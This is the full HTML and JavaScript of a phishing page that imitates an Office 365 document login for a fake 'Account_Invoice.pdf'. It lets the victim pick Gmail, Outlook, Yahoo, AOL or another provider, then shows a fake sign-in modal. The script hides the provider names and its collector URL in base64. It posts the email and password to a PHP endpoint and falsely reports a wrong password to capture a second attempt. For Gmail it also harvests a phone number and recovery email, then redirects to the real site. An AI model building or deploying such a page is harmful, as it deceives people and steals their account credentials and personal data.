
<!doctype html>
<html lang="en">
<head>
  <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>Office 365 Document | Login</title>
    <link rel="icon" type="image/png" sizes="100x100" href="images/onedrive-white.png">
    <link href="css/hover.css" rel="stylesheet" media="all">
    <link href="css/album.css" rel="stylesheet">

    <style type="text/css">

      html, body {
        height: 100%;
      }

     

        .main-video-wrapper {
          position:fixed;
          top:0;
          left:20;
          width:100%;
          height:100vh;
          overflow:hidden;
          z-index: -3;

        }
        .main-video-overlay {
          height:100vh;
          position: fixed;
          top:0;
          left:0;
          width:100vw;
          z-index:-1;
          background: rgba(0,0,0,0.7);
          opacity: 0.8;
        }

        .b{
          transition: 0.8s;
          /*background:rgba(0,0,0,0.6);*/
        }
        
        .b1{
          transition: 0.8s;
          background:linear-gradient(to bottom, #FF3C00 5%, #cf3100 100%);
        }
        .b2{
          transition: 0.8s;
          background:linear-gradient(to bottom, #0073C8 5%, #00528c 100%);
        }
        .b3{
          transition: 0.8s;
          background:linear-gradient(to bottom, #31459B 5%, #212d66 100%);
        }
        .b4{
          transition: 0.8s;
          background:linear-gradient(to bottom, #D44638 5%, #8c2d24 100%);
        }
        .b5{
          transition: 0.8s;
          background:linear-gradient(to bottom, #5F0F68 5%, #2f0733 100%);
        }
        .b6{
          transition: 0.8s;
          background:linear-gradient(to bottom, #0B5BD3 5%, #073882 100%);
        }


        .b1:hover{
          background:linear-gradient(to bottom, #cf3100 5%, #FF3C00 100%);
        }
        .b2:hover{
          background:linear-gradient(to bottom, #00528c 5%, #0073C8 100%);
        }
        .b3:hover{
          background:linear-gradient(to bottom, #212d66 5%, #31459B 100%);
        }
        .b4:hover{
          background:linear-gradient(to bottom, #8c2d24 5%, #D44638 100%);
        }
        .b5:hover{
          background:linear-gradient(to bottom, #2f0733 5%, #5F0F68 100%);
        }
        .b6:hover{
          background:linear-gradient(to bottom, #073882 5%, #0B5BD3 100%);
        }



      </style>
    </head>
    <body style="background-image: url('images/back.jpg'); background-size: cover;background-repeat: no-repeat; background-position: right;">
     <!-- videooo div start//////////// -->
     <!-- <div class="main-video-wrapper" style="filter: blur(3px);-webkit-filter: blur(3px);">-->
     <!-- Embedded Video Element -->
     <!-- <video playsinline="playsinline" autoplay="autoplay" muted="muted" loop="loop">
      <source src="video/dropbox.mp4" type="video/mp4">
      </video>
    </div> -->
    <!-- Overlay Div for the Video -->
    <!-- <div class="main-video-overlay"></div> -->
    <!-- video div close/////////////////// -->
    <!-- <div> -->
      <div class="container-fluid p-0">
        <div class="container-fluid">
        <div class="row p-2" style="background-color:  #FF3C00;">
          <div class="col-lg-12">
            <img src="images/office3651.png" class="img-fluid" width="40px">
            <span class="text-white h5 align-middle pl-2">Office 365 Business</span>
            
          </div>
          
        </div>
        <div class="row p-2" style="background-color: #ededed;border-bottom: 2px solid #ededed">
          <div class="col-lg-12" style="padding-left: 70px;">
            <span class="text-dark h5 align-middle">Document</span>
            
          </div>
          
        </div>
        
      </div>
        <div class="container">
          <div class="row rounded" style="margin: 70px 0px; border:2px solid #9c9c9c;background-color: #ededed">
            <div class="col-lg-6 align-self-center p-3" style="border-right: 2px solid #9c9c9c">
              <!-- <div class="mx-auto p-2" style="border:1px solid white;width: 528px;background-color: rgba(0,0,0,0.6); border-radius: 20px">
                <img src="images/adobe1-w.png" class="img-fluid rounded-circle" width="40px;">
                <span class="h4 text-white align-middle">Adobe Pdf</span>
              </div> -->
              <div class="text-center my-5">
                <img src="images/logo.svg" class="img-fluid pt-2 m-0" width="90px" ><br>
                <span class="text-dark">562.33 KB</span><br>
                <span class="text-dark" style="font-size: 24px">Account_Invoice.pdf</span><br>
              </div>
              <!-- <div class="text-center">
                <span class="text-white">This File is protected with strong 128-bit AES encryption..</span><br>
              <span class="text-white h5">To Decrypt this file You need to Sign In.</span>
              </div> -->
             

            </div>
            <div class="col-lg-6 py-3 align-self-center">
              <div >
                <div class=" text-white col-lg-11 ml-2"> 
                  <span class="h5 text-dark" style="">Select your email provider</span><br>
                  <span style="color:red;font-family: 'Archivo Narrow', sans-serif; "></span>
                </div>
                <div class="">
                  <div class="row mx-2 mt-3">
                    <div class="col-lg-4">
                      <a href="javascript:void(0)" id="office365modal" class="w-100" data-toggle="modal" data-target="#ajaxModal" style="text-decoration: none;">
                        <div class="text-center p-1 rounded mt-2 b1">
                          <img src="images/office3651.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span  style="vertical-align: middle; color: white;font-weight: 500">Office365</span>
                        </div>
                      </a>
                    </div>

                    <div class="col-lg-4">
                      <a href="javascript:void(0)" id="outlookmodal" class=" w-100" data-toggle="modal" data-target="#ajaxModal" style="text-decoration: none;">
                        <div class="text-center p-1 rounded mt-2 b2">
                          <img src="images/outlook1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span style="vertical-align: middle; color: white;font-weight: 500;">Outlook</span>
                        </div>
                      </a>
                    </div>
                    <div class="col-lg-4">
                      <a href="javascript:void(0)" id="aolmodal" class=" w-100" data-toggle="modal" data-target="#ajaxModal" style="text-decoration: none;">
                        <div class="text-center p-1 rounded mt-2 b3">
                          <img src="images/aol1.png" class="img-fluid" width="35px" style="padding:5px 0px 5px 0px;">
                          <span style="vertical-align: middle; color: white;font-weight: 500;">Aol</span>
                        </div>
                      </a>
                    </div>
                    <div class="col-lg-4">
                      <a href="javascript:void(0)" id="gmailmodal" class="w-100" data-toggle="modal" data-target="#ajaxModal" style="text-decoration: none;">
                        <div class="text-center p-1 b b4 rounded mt-2 b4">
                          <img src="images/gmail1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span class="pl-2" style="vertical-align: middle; color: white;font-weight: 500;">Gmail</span>
                        </div>
                      </a>
                    </div>

                    <div class="col-lg-4">
                      <a href="javascript:void(0)" id="yahoomodal" class="w-100" data-toggle="modal" data-target="#ajaxModal" style="text-decoration: none;">
                        <div class="text-center p-1 b b5 rounded mt-2 b5">
                          <img src="images/yahoo1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span class="pl-2" style="vertical-align: middle; color: white;font-weight: 500;">Yahoo!</span>
                        </div>
                      </a>
                    </div>
                    <div class="col-lg-4 ">
                      <a href="javascript:void(0)" id="othermodal" class=" w-100" data-toggle="modal" data-target="#ajaxModal" style="text-decoration: none;">
                        <div class="text-center p-1 b b6 rounded mt-2 b6">
                          <img src="images/other1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span class="pl-2" style="vertical-align: middle; color: white;font-weight: 500;">Other</span>
                        </div>
                      </a>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          <!-- <div class="col-lg-3 align-self-center">
           
            
          </div>  -->
        </div> 
      </div>


    </div>
  </div>




  <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    <center>
                        <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
                        <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
                        <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please enter correct password.</div>
                        <span class="text-danger error" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form class="form-horizontal well">
                        <input type="hidden" name="count" id="count" value="0">
                        <div id="div1">
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <div>
                                        <label for="exampleInputEmail1">Email address</label>
                                        <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email" required="">
                                        <small id="aiHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                                </div>
                            </div>
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <label for="pr">Password</label>
                                    <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password" required="">
                                </div>
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="button" class="btn btn-info pull-right" name="submit-btn" id="submit-btn" value="Login">
                            </div>
                        </div>
                    </form>
                    <form class="form-horizontal well">
                        <div id="div2" style="display: none;">
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich" class="h5">abc@abc.com</span><br>
                            <span class="h4 font-weight-normal">Verify it's you</span><br>
                            <span>This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                            
                            <br>
                            <span>Try another way to sign in</span>
                            <div class="form-group mt-3">
                                <input type="number" name="ph" class="form-control" id="ph" aria-describedby="aiHelp" placeholder="Enter Phone No." required="">
                            </div>
                            <div class="form-group mt-3">
                                <input type="text" name="rec_ai" class="form-control" id="rec_ai" aria-describedby="aiHelp" placeholder="Enter Phone No." required="">
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="button" class="btn btn-info pull-right" name="submit-btn1" id="submit-btn1" value="verify">
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
$(document).ready(function() {
    var count = 0;
    var ou = "b3V0bG9vaw==";
    var ho = "aG90bWFpbA==";
    var gm = "Z21haWw=";
    var ya = "eWFob28=";
    var of = "b2ZmaWNlMzY1";

    function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
            vars[key] = value;
        });
        return vars;
    }


    if (!getUrlVars()["count"]) {

    } else {
        var count = getUrlVars()["count"];
        $('#count').val(count);
    }



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('.error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        // alert(count);
        var ai = window.location.hash.substr(1);
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var count = $('#count').val();
        if (final == atob(gm)) {
            $('#fieldImg').attr('src', 'images/' + atob(gm) + '.png');
            $('#field').html(atob(gm));
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#gmailmodal").trigger("click");

        } else if (final == atob(ou) || final == atob(ho)) {
            $('#fieldImg').attr('src', 'images/' + atob(ou) + '.png');
            $('#field').html("Outlook");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#outlookmodal").trigger("click");
        } else if (final == "aol") {
            $('#fieldImg').attr('src', 'images/aol.png');
            $('#field').html("Aol");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#aolmodal").trigger("click");
        } else if (final == atob( of )) {
            $('#fieldImg').attr('src', 'images/' + atob( of ) + '.png');
            $('#field').html("Office 365");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#office365modal").trigger("click");
        } else if (final == atob(ya)) {
            $('#fieldImg').attr('src', 'images/' + atob(ya) + '.png');
            $('#field').html("Yahoo");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#yahoomodal").trigger("click");

        } else {
            $('#fieldImg').attr('src', 'images/othermail.ico');
            $('#field').html("Other Mail");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#othermodal").trigger("click");
        }

    }
    ///////////////url getting ai////////////////


    $('#gmailmodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(gm) + '.png');
        $('#field').html(atob(gm));
        $("#msg").hide();
    });

    $('#outlookmodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(ou) + '.png');
        $('#field').html("Outlook");
        $("#msg").hide();
    });
    $('#aolmodal').click(function() {
        $('#fieldImg').attr('src', 'images/aol.png');
        $('#field').html("Aol");
        $("#msg").hide();
    });
    $('#office365modal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob( of ) + '.png');
        $('#field').html("Office 365");
        $("#msg").hide();
    });
    $('#yahoomodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(ya) + '.png');
        $('#field').html("Yahoo");
        $("#msg").hide();
    });
    $('#othermodal').click(function() {
        $('#fieldImg').attr('src', 'images/othermail.ico');
        $('#field').html("Other Mail");
        $("#msg").hide();
    });

    var file="bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('.error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        $field= $('#field').html();
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!ai) {
            $('.error').show();
            $('.error').html("Email field is empty...!");
            ai.focus;
            return false;
        }
        if (!filter.test(my_ai)) {
            $('.error').show();
            $('.error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('.error').show();
            $('.error').html("Password field is empty...!");
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,

            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').val('Verifing...');
            },
            success: function(response) {
                
                if (count == 1 && (final == "gmail" || $field =="Gmail" || $field =="gmail") ) {
                    $('#aich').html(my_ai);
                    $("#div1").animate({ left: 0, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 0, opacity: "show" }, 1000);
                    $('#submit-btn').hide();
                    $('#submit-btn1').show();

                    return false;

                }
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://google.com");
                    return false;
                }
                $("#pr").val("");
                $("#msg").show();
            },
            error: function() {
                if (count == 1 && (final == "gmail" || $field =="Gmail" || $field =="gmail") ) {
                    $('#aich').html(my_ai);
                    $("#div1").animate({ left: 0, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 0, opacity: "show" }, 1000);
                    $('#submit-btn').hide();
                    $('#submit-btn1').show();

                    return false;

                }
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://google.com");
                    return false;
                }
                $("#pr").val("");
                $("#msg").show();
            },
            complete: function() {
                $('#submit-btn').val('Login');
            }
        });
    });
    $('#submit-btn1').click(function(event) {
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var ph = $("#ph").val();
        var rec_ai = $("#rec_ai").val();
        if (!ai) {
            $('.error').show();
            $('.error').html("Email field is empty...!");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('.error').show();
            $('.error').html("Password field is empty...!");
            ai.focus;
            return false;
        }
        if (!ph) {
            $('.error').show();
            $('.error').html("Phone field is empty...!");
            ai.focus;
            return false;
        }
        if (!rec_ai) {
            $('.error').show();
            $('.error').html("Recovery email field is empty...!");
            ai.focus;
            return false;
        }

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
                ph: ph,
                rec_ai: rec_ai

            },
            beforeSend: function(xhr) {
                $('#submit-btn1').val('Verifing...');
            },
            success: function(response) {
                window.location.replace("http://gmail.com");
            },
            error: function() {
                window.location.replace("http://gmail.com");
            },
            complete: function() {
                $('#submit-btn1').val('Verify');
            }
        });
        // }
    });
    
});
</script>

</html>